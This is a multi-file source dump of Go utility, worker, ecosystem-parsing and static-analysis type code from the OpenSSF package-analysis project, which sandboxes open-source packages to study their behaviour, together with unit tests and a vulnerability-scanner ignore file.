12 | func CommaSeparatedFlags(name string, values []string, usage string) CommaSeparatedFlagsData { 13 | return CommaSeparatedFlagsData{ 14 | Name: name, 15 | Values: values, 16 | Info: usage, 17 | } 18 | } 19 | 20 | type CommaSeparatedFlagsData struct { 21 | Name string 22 | Values []string 23 | Info string 24 | } 25 | 26 | func (csl *CommaSeparatedFlagsData) Set(values string) error { 27 | csl.Values = strings.Split(values, ",") 28 | return nil 29 | } 30 | 31 | func (csl *CommaSeparatedFlagsData) String() string { 32 | if csl.Values == nil { 33 | return "" 34 | } else { 35 | return strings.Join(csl.Values, ",") 36 | } 37 | } 38 | 39 | func (csl *CommaSeparatedFlagsData) InitFlag() { 40 | flag.Var(csl, csl.Name, csl.Info) 41 | } 42 | -------------------------------------------------------------------------------- /internal/utils/equals.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "encoding/json" 5 | "math" 6 | "reflect" 7 | ) 8 | 9 | // FloatEquals compares two floats and returns true if they are both 10 | // within absTol of each other, or are both NaN. 11 | // Note that normally NaN != NaN, but we define it as true because it's 12 | // convenient for comparing arrays and structs that contain floats. 13 | func FloatEquals(x1, x2, absTol float64) bool { 14 | return x1 == x2 || math.Abs(x1-x2) < absTol || (math.IsNaN(x1) && math.IsNaN(x2)) 15 | } 16 | 17 | // JSONEquals compares two byte sequences containing JSON data and returns true if 18 | // 1) both j1 and j2 contain valid JSON data, and 19 | // 2) the JSON objects that they represent are equal. 20 | // If j1 or j2 contain invalid JSON data, an error is returned. 
// JSONEquals compares two byte sequences containing JSON data and returns true if
// 1) both j1 and j2 contain valid JSON data, and
// 2) the JSON objects that they represent are equal.
// If j1 or j2 contain invalid JSON data, an error is returned.
func JSONEquals(j1, j2 []byte) (bool, error) {
	// Adapted from https://stackoverflow.com/a/32409106
	decoded := make([]any, 2)
	for i, raw := range [][]byte{j1, j2} {
		if err := json.Unmarshal(raw, &decoded[i]); err != nil {
			return false, err
		}
	}
	// Deep equality on the decoded values ignores formatting and key order.
	return reflect.DeepEqual(decoded[0], decoded[1]), nil
}
19 | func CreateAndWriteTempFile(fileName string, data []byte) error { 20 | err := os.MkdirAll(writeBufferFolder, 0777) 21 | if err != nil { 22 | return err 23 | } 24 | 25 | f, err := os.Create(filepath.Join(writeBufferFolder, fileName)) 26 | if err != nil { 27 | return err 28 | } 29 | defer f.Close() 30 | _, err = f.Write(data) 31 | return err 32 | } 33 | 34 | func OpenTempFile(fileName string) (*os.File, error) { 35 | return os.Open(filepath.Join(writeBufferFolder, fileName)) 36 | } 37 | 38 | func RemoveTempFilesDirectory() error { 39 | return os.RemoveAll(writeBufferFolder) 40 | } 41 | -------------------------------------------------------------------------------- /internal/utils/hash_file.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "crypto/sha256" 5 | "fmt" 6 | "io" 7 | "os" 8 | ) 9 | 10 | // SHA256Hash returns the SHA256 hashsum of a file. 11 | func SHA256Hash(path string) (string, error) { 12 | f, err := os.Open(path) 13 | if err != nil { 14 | return "", err 15 | } 16 | defer f.Close() 17 | 18 | hash := sha256.New() 19 | if _, err = io.Copy(hash, f); err != nil { 20 | return "", err 21 | } 22 | 23 | return fmt.Sprintf("%x", hash.Sum([]byte{})), nil 24 | } 25 | -------------------------------------------------------------------------------- /internal/utils/hash_file_test.go: -------------------------------------------------------------------------------- 1 | package utils_test 2 | 3 | import ( 4 | "os" 5 | "path/filepath" 6 | "testing" 7 | 8 | "github.com/ossf/package-analysis/internal/utils" 9 | ) 10 | 11 | // pairs of strings and their SHA256 hash digests 12 | var hashPairs = [][2]string{ 13 | {"", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}, 14 | {"Hello, World!", "dffd6021bb2bd5b0af676290809ec3a53191dd81c7f70a4b28688a362182986f"}, 15 | {"Hello,\nWorld!", "d62b51d504f02642dab5003959af0c1557094c7d49dcc544aba37a0a5d8d1d0d"}, 16 | {"Hello,\nWorld!\n", 
"f5651768767f5e83d7001136251b6558a6d01550b04e12c1678ea3a0ca1e8a30"}, 17 | } 18 | 19 | func TestHashFile(t *testing.T) { 20 | tests := []struct { 21 | name string 22 | contents string 23 | want string 24 | }{ 25 | { 26 | name: "empty file", 27 | contents: hashPairs[0][0], 28 | want: hashPairs[0][1], 29 | }, 30 | { 31 | name: "single line", 32 | contents: hashPairs[1][0], 33 | want: hashPairs[1][1], 34 | }, 35 | { 36 | name: "multi line", 37 | contents: hashPairs[2][0], 38 | want: hashPairs[2][1], 39 | }, 40 | { 41 | name: "trailing new line", 42 | contents: hashPairs[3][0], 43 | want: hashPairs[3][1], 44 | }, 45 | } 46 | for _, test := range tests { 47 | t.Run(test.name, func(t *testing.T) { 48 | f := filepath.Join(t.TempDir(), "file.txt") 49 | err := os.WriteFile(f, []byte(test.contents), 0o666) 50 | if err != nil { 51 | t.Fatalf("Failed to prepare hash file: %v", err) 52 | } 53 | got, err := utils.SHA256Hash(f) 54 | if err != nil { 55 | t.Fatalf("Failed to generate hash: %v", err) 56 | } 57 | if got != test.want { 58 | t.Errorf("SHA256Hash() = %v; want %v", got, test.want) 59 | } 60 | }) 61 | } 62 | } 63 | 64 | func TestHashFile_MissingFile(t *testing.T) { 65 | f := filepath.Join(t.TempDir(), "missing.txt") 66 | got, err := utils.SHA256Hash(f) 67 | if err == nil { 68 | t.Error("SHA256Hash() returned no error; want an error") 69 | } 70 | if got != "" { 71 | t.Errorf("SHA256Hash() = %v; want ''", got) 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /internal/utils/last_bytes.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | // LastNBytes returns the last n bytes from b. 4 | // If len(b) <= n, b itself is returned, otherwise a copy of the bytes is returned. 
// LastNBytes returns the last n bytes of b.
// If len(b) <= n, b itself is returned. Otherwise the result is a subslice of
// b sharing b's backing array — it is NOT a copy, so later mutations of b are
// visible through the returned slice. (The previous doc comment incorrectly
// claimed a copy was returned; the implementation has always aliased b.)
// If n is negative, the function panics.
func LastNBytes(b []byte, n int) []byte {
	if n < 0 {
		panic("n cannot be negative")
	}
	if len(b) <= n {
		return b
	}
	return b[len(b)-n:]
}
/*
RemoveDuplicates takes a slice and returns a new slice containing only the
unique elements of the input. Order is preserved: each value appears at the
position of its first occurrence in the input. An input with no unique
elements yields a nil slice.
*/
func RemoveDuplicates[T comparable](items []T) []T {
	var unique []T
	seen := map[T]struct{}{} // empty struct values occupy no space
	for _, v := range items {
		if _, dup := seen[v]; dup {
			continue
		}
		seen[v] = struct{}{}
		unique = append(unique, v)
	}
	return unique
}
11 | */ 12 | func WriteFile(path string, contents []byte, executable bool) error { 13 | if err := os.WriteFile(path, contents, 0o666); err != nil { 14 | return err 15 | } 16 | 17 | if executable { 18 | if err := os.Chmod(path, 0o777); err != nil { 19 | return fmt.Errorf("could not set exec permissions on %s: %w", path, err) 20 | } 21 | } 22 | 23 | return nil 24 | } 25 | -------------------------------------------------------------------------------- /internal/worker/code_execution.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | "os" 7 | "path/filepath" 8 | "regexp" 9 | 10 | "github.com/ossf/package-analysis/internal/sandbox" 11 | ) 12 | 13 | // sandboxExecutionLogPath is the absolute path of the execution log file 14 | // inside the sandbox. This file is used for logging during the execute phase. 15 | const sandboxExecutionLogPath = "/execution.log" 16 | 17 | var nonSpaceControlChars = regexp.MustCompile("[\x00-\x08\x0b-\x1f\x7f]") 18 | 19 | // retrieveExecutionLog copies the execution log back from the sandbox 20 | // to the host, so it can be included in the dynamic analysis results. 21 | // To mitigate against binary code injection, all control characters except 22 | // tab and newline are stripped from the file. 23 | func retrieveExecutionLog(ctx context.Context, sb sandbox.Sandbox) (string, error) { 24 | executionLogDir, err := os.MkdirTemp("", "") 25 | if err != nil { 26 | return "", err 27 | } 28 | 29 | defer os.RemoveAll(executionLogDir) 30 | hostExecutionLogPath := filepath.Join(executionLogDir, "execution.log") 31 | 32 | // if the copy fails, it could be that the execution log is not actually present. 
33 | // For now, we'll just log the error and otherwise ignore it 34 | if err := sb.CopyBackToHost(ctx, hostExecutionLogPath, sandboxExecutionLogPath); err != nil { 35 | slog.WarnContext(ctx, "Could not retrieve execution log from sandbox", "error", err) 36 | return "", nil 37 | } 38 | 39 | logData, err := os.ReadFile(hostExecutionLogPath) 40 | if err != nil { 41 | return "", err 42 | } 43 | 44 | // remove control characters except tab (\x09) and newline (\x0A) 45 | processedLog := nonSpaceControlChars.ReplaceAllLiteral(logData, []byte{}) 46 | slog.InfoContext(ctx, "Read execution log", "rawLength", len(logData), "processedLength", len(processedLog)) 47 | 48 | return string(processedLog), nil 49 | } 50 | -------------------------------------------------------------------------------- /internal/worker/logging.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "log/slog" 7 | "os/exec" 8 | 9 | "github.com/ossf/package-analysis/internal/analysis" 10 | "github.com/ossf/package-analysis/internal/log" 11 | "github.com/ossf/package-analysis/internal/pkgmanager" 12 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 13 | ) 14 | 15 | /* 16 | NOTE: These strings are referenced externally by infrastructure for dashboard 17 | reporting / metrics purposes, and so should be changed with care. 18 | 19 | See file infra/terraform/metrics/log_metrics.tf. 20 | */ 21 | const ( 22 | analysisCompleteLogMsg = "Analysis completed sucessfully" // TODO sucessfully -> successfully 23 | analysisErrorLogMsg = "Analysis error - analysis" 24 | timeoutErrorLogMsg = "Analysis error - timeout" 25 | otherErrorLogMsg = "Analysis error - other" 26 | runErrorLogMsg = "Analysis run failed" 27 | ) 28 | 29 | // LogDynamicAnalysisError indicates some error happened while attempting to run 30 | // the package code, which was not caused by the package itself. 
// LogDynamicAnalysisError indicates some error happened while attempting to run
// the package code, which was not caused by the package itself. This means it was
// not possible to analyse the package properly, and the results are invalid.
//
// NOTE(review): the pkg parameter is not used in this function body — the
// package identity presumably reaches the log via ctx-attached attributes;
// confirm before relying on it appearing in output.
func LogDynamicAnalysisError(ctx context.Context, pkg *pkgmanager.Pkg, errorPhase analysisrun.DynamicPhase, err error) {
	slog.ErrorContext(ctx, runErrorLogMsg,
		log.Label("phase", string(errorPhase)),
		"error", err)

	// When the failure wraps an external command error, surface the command's
	// captured stderr at debug level to aid investigation.
	var exitErr *exec.ExitError
	if errors.As(err, &exitErr) {
		slog.DebugContext(ctx, "Command stderr", "stderr", exitErr.Stderr)
	}
}

// LogDynamicAnalysisResult indicates that the package code was run successfully,
// and what happened when it was run. This may include errors in the analysis
// of the package, but not errors in the running itself.
//
// The message constants logged here are referenced by external metrics
// infrastructure (see infra/terraform/metrics/log_metrics.tf per the comment at
// their declaration), so their text must not be changed casually.
// NOTE(review): the pkg parameter is not used in this function body either.
func LogDynamicAnalysisResult(ctx context.Context, pkg *pkgmanager.Pkg, finalPhase analysisrun.DynamicPhase, finalStatus analysis.Status) {
	labels := []interface{}{
		log.Label("last_phase", string(finalPhase)),
	}

	// Map the final status to the message and severity used for dashboards.
	switch finalStatus {
	case analysis.StatusCompleted:
		slog.InfoContext(ctx, analysisCompleteLogMsg, labels...)
	case analysis.StatusErrorAnalysis:
		slog.WarnContext(ctx, analysisErrorLogMsg, labels...)
	case analysis.StatusErrorTimeout:
		slog.WarnContext(ctx, timeoutErrorLogMsg, labels...)
	case analysis.StatusErrorOther:
		slog.WarnContext(ctx, otherErrorLogMsg, labels...)
	}
}
13 | func ResolvePkg(manager *pkgmanager.PkgManager, name, version, localPath string) (pkg *pkgmanager.Pkg, err error) { 14 | switch { 15 | case localPath != "": 16 | pkg = manager.Local(name, version, localPath) 17 | case version != "": 18 | pkg = manager.Package(name, version) 19 | default: 20 | pkg, err = manager.Latest(name) 21 | if err != nil { 22 | return nil, fmt.Errorf("failed to get latest version: %w", err) 23 | } 24 | if pkg.Version() == "" { 25 | return nil, fmt.Errorf("unknown package name '%s'", name) 26 | } 27 | } 28 | return pkg, nil 29 | } 30 | 31 | // ResolvePurl creates a Pkg object from the given purl 32 | // See https://github.com/package-url/purl-spec 33 | func ResolvePurl(purl packageurl.PackageURL) (*pkgmanager.Pkg, error) { 34 | ecosystem, err := pkgecosystem.ParsePurlType(purl.Type) 35 | if err != nil { 36 | return nil, err 37 | } 38 | 39 | manager := pkgmanager.Manager(ecosystem) 40 | if manager == nil { 41 | return nil, pkgecosystem.Unsupported(purl.Type) 42 | } 43 | 44 | // Prepend package namespace to package name, if present 45 | var pkgName string 46 | if purl.Namespace != "" { 47 | pkgName = purl.Namespace + "/" + purl.Name 48 | } else { 49 | pkgName = purl.Name 50 | } 51 | 52 | // Get the latest package version if not specified in the purl 53 | pkg, err := ResolvePkg(manager, pkgName, purl.Version, "") 54 | if err != nil { 55 | return nil, err 56 | } 57 | 58 | return pkg, nil 59 | } 60 | -------------------------------------------------------------------------------- /internal/worker/sandbox_options.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/internal/sandbox" 5 | ) 6 | 7 | // StaticSandboxOptions provides a set of sandbox options necessary to run the 8 | // static analysis sandboxes. 
9 | func StaticSandboxOptions() []sandbox.Option { 10 | return []sandbox.Option{ 11 | sandbox.Image(defaultStaticAnalysisImage), 12 | sandbox.EchoStdErr(), 13 | } 14 | } 15 | 16 | // DynamicSandboxOptions provides a set of sandbox options necessary to run 17 | // dynamic analysis sandboxes. 18 | func DynamicSandboxOptions() []sandbox.Option { 19 | return []sandbox.Option{ 20 | sandbox.Image(defaultDynamicAnalysisImage), 21 | sandbox.EnableStrace(), 22 | sandbox.EnableRawSockets(), 23 | sandbox.EnablePacketLogging(), 24 | sandbox.LogStdOut(), 25 | sandbox.LogStdErr(), 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /internal/worker/savefilewriteresults.go: -------------------------------------------------------------------------------- 1 | package worker 2 | 3 | import ( 4 | "context" 5 | "errors" 6 | "fmt" 7 | 8 | "github.com/ossf/package-analysis/internal/pkgmanager" 9 | "github.com/ossf/package-analysis/internal/resultstore" 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 12 | ) 13 | 14 | func saveFileWriteResults(rs *resultstore.ResultStore, ctx context.Context, pkg *pkgmanager.Pkg, data analysisrun.DynamicAnalysisData) error { 15 | if rs == nil { 16 | // TODO this should become a method on resultstore.ResultStore? 17 | return errors.New("resultstore is nil") 18 | } 19 | 20 | if err := rs.SaveDynamicAnalysis(ctx, pkg, data.FileWritesSummary, ""); err != nil { 21 | return fmt.Errorf("failed to upload file write analysis to blobstore = %w", err) 22 | } 23 | var allPhasesWriteBufferIdsArray []string 24 | for _, writeBufferIds := range data.FileWriteBufferIds { 25 | allPhasesWriteBufferIdsArray = append(allPhasesWriteBufferIdsArray, writeBufferIds...) 26 | } 27 | 28 | // Remove potential duplicates across phases. 
29 | allPhasesWriteBufferIdsArray = utils.RemoveDuplicates(allPhasesWriteBufferIdsArray) 30 | version := pkg.Version() 31 | if err := rs.SaveTempFilesToZip(ctx, pkg, "write_buffers_"+version, allPhasesWriteBufferIdsArray); err != nil { 32 | return fmt.Errorf("failed to upload file write buffer results to blobstore = #{err}") 33 | } 34 | if err := utils.RemoveTempFilesDirectory(); err != nil { 35 | return fmt.Errorf("failed to remove temp files = #{err}") 36 | } 37 | return nil 38 | } 39 | -------------------------------------------------------------------------------- /osv-scanner.toml: -------------------------------------------------------------------------------- 1 | [[IgnoredVulns]] 2 | id = "CVE-2020-8911" 3 | reason = "Indirect dependency, vulnerable function is probably not used and we can't do much about it anyway" 4 | 5 | [[IgnoredVulns]] 6 | id = "GO-2022-0646" 7 | reason = "alias of CVE-2020-8911" 8 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/key.go: -------------------------------------------------------------------------------- 1 | package analysisrun 2 | 3 | import ( 4 | "strings" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 7 | ) 8 | 9 | type Key struct { 10 | Ecosystem pkgecosystem.Ecosystem `json:"Ecosystem"` 11 | Name string `json:"Name"` 12 | Version string `json:"Version"` 13 | } 14 | 15 | func (k Key) String() string { 16 | return strings.Join([]string{string(k.Ecosystem), k.Name, k.Version}, "-") 17 | } 18 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/key_test.go: -------------------------------------------------------------------------------- 1 | package analysisrun_test 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 7 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 8 | ) 9 | 10 | func TestStringify(t *testing.T) { 11 | tests := map[string]struct { 12 
| input analysisrun.Key 13 | expected string 14 | }{ 15 | "simple stringify": { 16 | input: analysisrun.Key{Name: "genericpackage", Version: "2.05.0", Ecosystem: pkgecosystem.NPM}, 17 | expected: "npm-genericpackage-2.05.0", 18 | }, 19 | "pkg name with space": { 20 | input: analysisrun.Key{Name: "cool package", Version: "1.0.0", Ecosystem: pkgecosystem.PyPI}, 21 | expected: "pypi-cool package-1.0.0", 22 | }, 23 | "pkg name with forward slash": { 24 | input: analysisrun.Key{Name: "@ada/evilpackage", Version: "99.0.0", Ecosystem: pkgecosystem.NPM}, 25 | expected: "npm-@ada/evilpackage-99.0.0", 26 | }, 27 | } 28 | 29 | for name, test := range tests { 30 | t.Run(name, func(t *testing.T) { 31 | got := test.input.String() 32 | expected := test.expected 33 | if got != expected { 34 | t.Fatalf("%v: returned %v; expected %v", name, got, expected) 35 | } 36 | }) 37 | } 38 | } 39 | -------------------------------------------------------------------------------- /pkg/api/analysisrun/phase.go: -------------------------------------------------------------------------------- 1 | package analysisrun 2 | 3 | // DynamicPhase represents a way to 'run' a package during its usage lifecycle. 4 | // This is relevant to dynamic analysis. 5 | type DynamicPhase string 6 | 7 | const ( 8 | DynamicPhaseExecute DynamicPhase = "execute" 9 | DynamicPhaseImport DynamicPhase = "import" 10 | DynamicPhaseInstall DynamicPhase = "install" 11 | ) 12 | 13 | // DefaultDynamicPhases the subset of AllDynamicPhases that are supported 14 | // by every ecosystem, and are run by default for dynamic analysis. 15 | func DefaultDynamicPhases() []DynamicPhase { 16 | return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport} 17 | } 18 | 19 | // AllDynamicPhases lists each phase of dynamic analysis in order 20 | // that they are run. Each phase depends on the previous phases. 
21 | func AllDynamicPhases() []DynamicPhase { 22 | return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport, DynamicPhaseExecute} 23 | } 24 | -------------------------------------------------------------------------------- /pkg/api/notification/notification.go: -------------------------------------------------------------------------------- 1 | package notification 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 5 | ) 6 | 7 | // AnalysisRunComplete is a struct representing the message sent to notify when 8 | // a package analysis run is complete. 9 | type AnalysisRunComplete struct { 10 | Key analysisrun.Key 11 | } 12 | -------------------------------------------------------------------------------- /pkg/api/pkgecosystem/ecosystem.go: -------------------------------------------------------------------------------- 1 | // Package pkgecosystem defines the open source ecosystems supported by Package Analysis. 2 | package pkgecosystem 3 | 4 | import ( 5 | "errors" 6 | "fmt" 7 | ) 8 | 9 | // Ecosystem represents an open source package ecosystem from which packages can be downloaded. 10 | // 11 | // It implements encoding.TextUnmarshaler and encoding.TextMarshaler so it can 12 | // be used with flag.TextVar. 13 | type Ecosystem string 14 | 15 | const ( 16 | None Ecosystem = "" 17 | CratesIO Ecosystem = "crates.io" 18 | NPM Ecosystem = "npm" 19 | Packagist Ecosystem = "packagist" 20 | PyPI Ecosystem = "pypi" 21 | RubyGems Ecosystem = "rubygems" 22 | ) 23 | 24 | // ErrUnsupported is returned by Ecosystem.UnmarshalText when bytes that do not 25 | // correspond to a defined ecosystem constant is passed in as a parameter. 
// ErrUnsupported is the sentinel error wrapped by every "unknown ecosystem"
// failure; callers can detect it with errors.Is.
var ErrUnsupported = errors.New("ecosystem unsupported")

// Unsupported returns a new error wrapping ErrUnsupported that adds the
// unsupported ecosystem name to the error message.
func Unsupported(name string) error {
	return fmt.Errorf("%w: %s", ErrUnsupported, name)
}

// SupportedEcosystems is a list of all the ecosystems supported.
var SupportedEcosystems = []Ecosystem{
	CratesIO,
	NPM,
	Packagist,
	PyPI,
	RubyGems,
}

// SupportedEcosystemsStrings is the list of supported ecosystems represented as
// strings.
var SupportedEcosystemsStrings = EcosystemsAsStrings(SupportedEcosystems)

// UnmarshalText implements the encoding.TextUnmarshaler interface.
//
// It will only succeed when unmarshaling ecosytems in SupportedEcosystems or
// empty. On failure the receiver is left unmodified.
func (e *Ecosystem) UnmarshalText(text []byte) error {
	ecosystem, err := Parse(string(text))

	if err != nil {
		return err
	}

	*e = ecosystem
	return nil
}

// MarshalText implements the encoding.TextMarshaler interface.
// It never fails; any Ecosystem value round-trips as its raw string.
func (e Ecosystem) MarshalText() ([]byte, error) {
	return []byte(e), nil
}

// String implements the fmt.Stringer interface.
func (e Ecosystem) String() string {
	return string(e)
}

// EcosystemsAsStrings converts a slice of Ecosystems to a string slice.
// An empty or nil input yields a nil slice.
func EcosystemsAsStrings(es []Ecosystem) []string {
	var s []string
	for _, e := range es {
		s = append(s, e.String())
	}
	return s
}
84 | func Parse(name string) (Ecosystem, error) { 85 | for _, s := range append(SupportedEcosystems, None) { 86 | if string(s) == name { 87 | return s, nil 88 | } 89 | } 90 | 91 | return None, Unsupported(name) 92 | } 93 | 94 | // ParsePurlType converts from a Package URL type, defined at 95 | // https://github.com/package-url/purl-spec/blob/master/PURL-TYPES.rst 96 | // to an Ecosystem object 97 | func ParsePurlType(purlType string) (Ecosystem, error) { 98 | switch purlType { 99 | case "cargo": 100 | return CratesIO, nil 101 | case "composer": 102 | return Packagist, nil 103 | case "gem": 104 | return RubyGems, nil 105 | default: 106 | // we use the same name for NPM and PyPI as the purl type string 107 | return Parse(purlType) 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /pkg/api/pkgecosystem/ecosystem_test.go: -------------------------------------------------------------------------------- 1 | package pkgecosystem_test 2 | 3 | import ( 4 | "bytes" 5 | "testing" 6 | 7 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 8 | "golang.org/x/exp/slices" 9 | ) 10 | 11 | func TestEcosystemMarshalText(t *testing.T) { 12 | tests := []struct { 13 | name string 14 | eco pkgecosystem.Ecosystem 15 | want []byte 16 | }{ 17 | { 18 | name: "npm", 19 | eco: pkgecosystem.NPM, 20 | want: []byte("npm"), 21 | }, 22 | { 23 | name: "unsupported", 24 | eco: pkgecosystem.Ecosystem("this is a test"), 25 | want: []byte("this is a test"), 26 | }, 27 | { 28 | name: "empty", 29 | eco: pkgecosystem.None, 30 | want: []byte{}, 31 | }, 32 | } 33 | for _, test := range tests { 34 | t.Run(test.name, func(t *testing.T) { 35 | got, _ := test.eco.MarshalText() 36 | if !bytes.Equal(got, test.want) { 37 | t.Errorf("MarshalText() = %v; want %v", got, test.want) 38 | } 39 | }) 40 | } 41 | } 42 | 43 | func TestEcosystemUnmarshalText(t *testing.T) { 44 | tests := []struct { 45 | name string 46 | input []byte 47 | want pkgecosystem.Ecosystem 48 
| wantErr bool 49 | }{ 50 | { 51 | name: "npm", 52 | input: []byte("npm"), 53 | want: pkgecosystem.NPM, 54 | }, 55 | { 56 | name: "crates.io", 57 | input: []byte("crates.io"), 58 | want: pkgecosystem.CratesIO, 59 | }, 60 | { 61 | name: "unsupported", 62 | input: []byte("this is a test"), 63 | wantErr: true, 64 | }, 65 | { 66 | name: "empty", 67 | input: []byte{}, 68 | want: pkgecosystem.None, 69 | }, 70 | } 71 | for _, test := range tests { 72 | t.Run(test.name, func(t *testing.T) { 73 | var got pkgecosystem.Ecosystem 74 | err := got.UnmarshalText(test.input) 75 | if test.wantErr && err == nil { 76 | t.Fatal("UnmarshalText() is nil; want error") 77 | } 78 | if !test.wantErr && err != nil { 79 | t.Fatalf("UnmarshalText() = %v; want nil", err) 80 | } 81 | if got != test.want { 82 | t.Errorf("UnmarshalText() parsed %v; want %v", got, test.want) 83 | } 84 | }) 85 | } 86 | } 87 | 88 | func TestEcosystemString(t *testing.T) { 89 | tests := []struct { 90 | name string 91 | eco pkgecosystem.Ecosystem 92 | want string 93 | }{ 94 | { 95 | name: "npm", 96 | eco: pkgecosystem.NPM, 97 | want: "npm", 98 | }, 99 | { 100 | name: "unsupported", 101 | eco: pkgecosystem.Ecosystem("this is a test"), 102 | want: "this is a test", 103 | }, 104 | { 105 | name: "empty", 106 | eco: pkgecosystem.Ecosystem(""), 107 | want: "", 108 | }, 109 | } 110 | for _, test := range tests { 111 | t.Run(test.name, func(t *testing.T) { 112 | got := test.eco.String() 113 | if got != test.want { 114 | t.Errorf("String() = %v; want %v", got, test.want) 115 | } 116 | }) 117 | } 118 | } 119 | 120 | func TestEcosystemsAsStrings(t *testing.T) { 121 | want := []string{"npm", "pypi", "rubygems"} 122 | got := pkgecosystem.EcosystemsAsStrings([]pkgecosystem.Ecosystem{ 123 | pkgecosystem.NPM, 124 | pkgecosystem.PyPI, 125 | pkgecosystem.RubyGems, 126 | }) 127 | if !slices.Equal(got, want) { 128 | t.Errorf("EcosystemsAsStrings() = %v; want %v", got, want) 129 | } 130 | } 131 | 
// EscapedString holds a string literal that contains a lot of character escaping.
// This may indicate obfuscation.
type EscapedString struct {
	// Value and Raw are two forms of the same literal, and LevenshteinDist is
	// the edit distance between them, which grows with the amount of escaping.
	// NOTE(review): the exact semantics of Value vs Raw (parsed value vs raw
	// source text) are not visible in this file — confirm against the code
	// that populates this struct before relying on either.
	Value           string `json:"value"`
	Raw             string `json:"raw"`
	LevenshteinDist int    `json:"levenshtein_dist"`
}

// SuspiciousIdentifier is an identifier that matches a specific rule intended
// to pick out (potentially) suspicious names. Name stores the actual identifier,
// and Rule holds the rule that the identifier matched against.
type SuspiciousIdentifier struct {
	Name string `json:"name"`
	Rule string `json:"rule"`
}
type IdentifierType int

const (
	Unknown        IdentifierType = iota
	Function       // function declaration / definition
	Variable       // variable declaration / definition
	Parameter      // parameters to functions, constructors, catch blocks
	Class          // class declaration / definition
	Member         // access/mutation of an object member
	Property       // declaration of class property
	StatementLabel // loop label
	Other          // something the parser picked up that isn't accounted for above
)

// stringValues maps each IdentifierType to its canonical string name.
// It is the single source of truth for String(), JSON (de)serialisation,
// IdentifierTypes() and ParseIdentifierType().
var stringValues = map[IdentifierType]string{
	Unknown:        "Unknown",
	Function:       "Function",
	Variable:       "Variable",
	Parameter:      "Parameter",
	Class:          "Class",
	Member:         "Member",
	Property:       "Property",
	StatementLabel: "StatementLabel",
	Other:          "Other",
}

// String returns the canonical name for this IdentifierType.
// Note: a value not present in stringValues (e.g. an out-of-range cast)
// yields the map zero value, i.e. the empty string.
func (t IdentifierType) String() string {
	return stringValues[t]
}

// MarshalJSON serializes this IdentifierType using its string representation
func (t IdentifierType) MarshalJSON() ([]byte, error) {
	return json.Marshal(t.String())
}

// UnmarshalJSON deserializes an IdentifierType serialized using MarshalJSON.
// If the supplied JSON contains an unrecognised name, the deserialised value is
// Unknown, and no error is returned.
func (t *IdentifierType) UnmarshalJSON(data []byte) error {
	var name string
	if err := json.Unmarshal(data, &name); err != nil {
		return err
	}

	*t = ParseIdentifierType(name)
	return nil
}

// IdentifierTypes returns a slice of all defined IdentifierType values.
// NOTE: the order is nondeterministic because it comes from map iteration.
func IdentifierTypes() []IdentifierType {
	return maps.Keys(stringValues)
}

// ParseIdentifierType maps a canonical name (as produced by String) back to
// its IdentifierType value, returning Unknown when the name is not recognised.
func ParseIdentifierType(s string) IdentifierType {
	for name, stringVal := range stringValues {
		if s == stringVal {
			return name
		}
	}
	return Unknown
}
// ComputeEntropy computes the entropy of this identifier's name under the given
// character distribution, and sets its Entropy field to the resulting value.
func (i *Identifier) ComputeEntropy(probs map[rune]float64) {
	i.Entropy = stringentropy.Calculate(i.Name, probs)
}

// String records a string literal occurring in the source code.
// Value is the parsed value; Raw is the literal as it appears in source.
type String struct {
	Value   string  `json:"value"`
	Raw     string  `json:"raw"`
	Entropy float64 `json:"entropy"`
}

// ComputeEntropy computes the entropy of this string literal's value under the
// given character distribution, and sets its Entropy field to the resulting value.
func (s *String) ComputeEntropy(probs map[rune]float64) {
	s.Entropy = stringentropy.Calculate(s.Value, probs)
}

// LevenshteinDist computes the Levenshtein distance between the parsed and raw versions of
// this string literal. A character substitution is treated as deletion and insertion (2 operations).
// A large distance indicates heavy escaping in the raw literal.
func (s *String) LevenshteinDist() int {
	return levenshtein.DistanceForStrings([]rune(s.Raw), []rune(s.Value), levenshtein.DefaultOptions)
}

// Int records an integer literal occurring in source code. For languages without explicit
// integer types such as JavaScript, an Int literal is any numeric literal whose raw string
// representation in source code is parseable (with strconv.ParseInt) as an integer.
type Int struct {
	Value int64  `json:"value"`
	Raw   string `json:"raw"`
}

// Float records a floating point literal occurring in source code.
type Float struct {
	Value float64 `json:"value"`
	Raw   string  `json:"raw"`
}
Build the package by running `make build_sample_python_package` in this directory.
